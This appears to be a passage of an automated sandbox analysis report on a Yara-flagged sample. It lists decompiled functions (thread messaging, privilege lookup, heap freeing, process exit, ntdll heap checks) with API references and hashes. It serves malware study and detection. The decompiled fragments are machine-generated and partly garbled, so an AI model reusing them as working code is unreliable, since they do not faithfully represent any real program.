                                  0x0040836d
                                  0x0040836e
                                  0x0040836f
                                  0x00408371
                                  0x00408372
                                  0x00408372

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 4b8697be5a983f66cd637a906566cd08e1f134ba96c1291396bba321000a867d
                                  • Instruction ID: c0a974f67d58cd21688ef725629d73523991c29b68bfafb4795568a75bf5ecb8
                                  • Opcode Fuzzy Hash: 4b8697be5a983f66cd637a906566cd08e1f134ba96c1291396bba321000a867d
                                  • Instruction Fuzzy Hash: ED01FE31A803247BEB21A6A54C43FEF7B6CAB40F54F05415DFE04BA1C1D6A9590647E9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t11;
				intOrPtr* _t12;
				int _t13;
				long _t20;
				intOrPtr _t22;
				intOrPtr* _t23;
				void* _t24;

				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				_t11 = E0041C3F0( &_v68, 3);
				_t22 = _a4;
				_push(_t24);
				asm("rcl byte [edx-0x7d], 0xc6");
				asm("sbb al, 0x56"); // executed
				E0040ACC0(); // executed
				_t12 = E00414E10(_t22, _t11, 0, 0, 0xc4e7b6d6);
				_t23 = _t12;
				if(_t23 != 0) {
					_t20 = _a8;
					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
					_t30 = _t13;
					if(_t13 == 0) {
						_t13 =  *_t23(_t20, 0x8003, _t24 + (E0040A450(_t30, 1, 8) & 0x000000ff) - 0x40, _t13);
					}
					return _t13;
				}
				return _t12;
			}












                                  0x004082ff
                                  0x00408303
                                  0x0040830e
                                  0x00408313
                                  0x00408317
                                  0x00408318
                                  0x0040831c
                                  0x0040831e
                                  0x0040832e
                                  0x00408333
                                  0x0040833a
                                  0x0040833d
                                  0x0040834a
                                  0x0040834c
                                  0x0040834e
                                  0x0040836b
                                  0x0040836b
                                  0x00000000
                                  0x0040836d
                                  0x00408372

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                  • Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
                                  • Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
                                  • Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A165, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 3fccd4f52506a040447b77a0d54fc764618cdd0347ee4b5f10e6345d81b1dd49
                                  • Instruction ID: 9cc37e98dcd31d442291603c3f2d16c1bf104d39ff86abce4631a72ffe5f5200
                                  • Opcode Fuzzy Hash: 3fccd4f52506a040447b77a0d54fc764618cdd0347ee4b5f10e6345d81b1dd49
                                  • Instruction Fuzzy Hash: 01E0EDB02082807FCB11CB659C10EE33FA8DF46314F14898AE88987202C020A42687B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041A060(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                  0x0041a06f
                                  0x0041a077
                                  0x0041a08d
                                  0x0041a091

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041A0A0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A950(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                  0x0041a0a3
                                  0x0041a0ba
                                  0x0041a0c8

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.292857818.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                                  • Instruction ID: 2204a83720acbdedcfd9b4a204bbad34eb0b970d47639a0b49348e1640651e68
                                  • Opcode Fuzzy Hash: 68b301fd94b954275722a09b62615f2322b6894302e13ce9c4a8807e9877d0eb
                                  • Instruction Fuzzy Hash: 1FB02B71D010C0C5D601D3B0060C7273A0077C0340F13C011D2024340B4338C194F2B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 0194B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                  Download Yara Rule
                                  Strings
                                  • *** Inpage error in %ws:%s, xrefs: 0194B418
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 0194B352
                                  • a NULL pointer, xrefs: 0194B4E0
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0194B39B
                                  • *** enter .exr %p for the exception record, xrefs: 0194B4F1
                                  • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0194B2F3
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0194B476
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0194B47D
                                  • Go determine why that thread has not released the critical section., xrefs: 0194B3C5
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B38F
                                  • an invalid address, %p, xrefs: 0194B4CF
                                  • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0194B3D6
                                  • The critical section is owned by thread %p., xrefs: 0194B3B9
                                  • *** then kb to get the faulting stack, xrefs: 0194B51C
                                  • The instruction at %p tried to %s , xrefs: 0194B4B6
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 0194B48F
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0194B323
                                  • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0194B2DC
                                  • The resource is owned exclusively by thread %p, xrefs: 0194B374
                                  • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0194B314
                                  • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0194B53F
                                  • This failed because of error %Ix., xrefs: 0194B446
                                  • write to, xrefs: 0194B4A6
                                  • <unknown>, xrefs: 0194B27E, 0194B2D1, 0194B350, 0194B399, 0194B417, 0194B48E
                                  • The resource is owned shared by %d threads, xrefs: 0194B37E
                                  • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0194B305
                                  • read from, xrefs: 0194B4AD, 0194B4B2
                                  • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0194B484
                                  • *** enter .cxr %p for the context, xrefs: 0194B50D
                                  • The instruction at %p referenced memory at %p., xrefs: 0194B432
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                  • API String ID: 0-108210295
                                  • Opcode ID: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                                  • Instruction ID: 205864ddb034f3b507504d6cbdd9b0a0b3fbd801c9dd46eda507b7b73253c8bc
                                  • Opcode Fuzzy Hash: b8948c3d847844ee0fdd5df42463af9fee03e147d10cdb2f785c0847a4b6b41d
                                  • Instruction Fuzzy Hash: F1812735A41210FFEB216A4ACC85EBB3F2AAF96B52F014148F50D9B256D265C601D7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01951C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 44%
                                  			E01951C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x18748a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x198589c);
				E0189B150("Heap error detected at %p (heap handle %p)\n",  *0x19858a0);
				_t27 =  *0x1985898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01951E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0189B150("Error code: %d - %s\n",  *0x1985898);
				_t113 =  *0x19858a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter1: %p\n",  *0x19858a4);
				}
				_t115 =  *0x19858a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter2: %p\n",  *0x19858a8);
				}
				_t117 =  *0x19858ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0189B150("Parameter3: %p\n",  *0x19858ac);
				}
				_t119 =  *0x19858b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x19858b4);
					E0189B150("Last known valid blocks: before - %p, after - %p\n",  *0x19858b0);
				} else {
					_t120 =  *0x19858b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0189B150();
				} else {
					E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0189B150("Stack trace available at %p\n", 0x19858c0);
			}











                                  0x01951c10
                                  0x01951c16
                                  0x01951c1e
                                  0x01951c3d
                                  0x01951c3e
                                  0x01951c20
                                  0x01951c35
                                  0x01951c3a
                                  0x01951c44
                                  0x01951c55
                                  0x01951c5a
                                  0x01951c65
                                  0x01951c67
                                  0x00000000
                                  0x01951c6e
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x01951c67
                                  0x01951cdc
                                  0x01951ce5
                                  0x01951d04
                                  0x01951d05
                                  0x01951ce7
                                  0x01951cfc
                                  0x01951d01
                                  0x01951d0b
                                  0x01951d17
                                  0x01951d1f
                                  0x01951d25
                                  0x01951d30
                                  0x01951d4f
                                  0x01951d50
                                  0x01951d32
                                  0x01951d47
                                  0x01951d4c
                                  0x01951d61
                                  0x01951d67
                                  0x01951d68
                                  0x01951d6e
                                  0x01951d79
                                  0x01951d98
                                  0x01951d99
                                  0x01951d7b
                                  0x01951d90
                                  0x01951d95
                                  0x01951daa
                                  0x01951db0
                                  0x01951db1
                                  0x01951db7
                                  0x01951dc2
                                  0x01951de1
                                  0x01951de2
                                  0x01951dc4
                                  0x01951dd9
                                  0x01951dde
                                  0x01951df3
                                  0x01951df9
                                  0x01951dfa
                                  0x01951e00
                                  0x01951e0a
                                  0x01951e13
                                  0x01951e32
                                  0x01951e33
                                  0x01951e15
                                  0x01951e2a
                                  0x01951e2f
                                  0x01951e39
                                  0x01951e4a
                                  0x01951e02
                                  0x01951e02
                                  0x01951e08
                                  0x00000000
                                  0x00000000
                                  0x01951e08
                                  0x01951e5b
                                  0x01951e7a
                                  0x01951e7b
                                  0x01951e5d
                                  0x01951e72
                                  0x01951e77
                                  0x01951e95

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                  • API String ID: 0-2897834094
                                  • Opcode ID: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                                  • Instruction ID: 8c9ffb38db90a38c4d9460b832dd019b6840eddf2c8da517139ec14880fa2bb6
                                  • Opcode Fuzzy Hash: 911e8466ca1195c20a1a03120ee03ca42cbd6e603d863dcfb1adfcb44d5d65a4
                                  • Instruction Fuzzy Hash: 3361D432925985DFE751FB89E484F2473A4EB04B21B0E843AF90DFB311D6649A44CB1B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01954AEF, Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E01954AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E0189B150();
						} else {
							E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E0189B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0189B150();
					} else {
						E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0194FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E0189B150();
						} else {
							E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E0189B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E0189B150();
									} else {
										E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E0189B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0194FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E0189B150();
										} else {
											E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
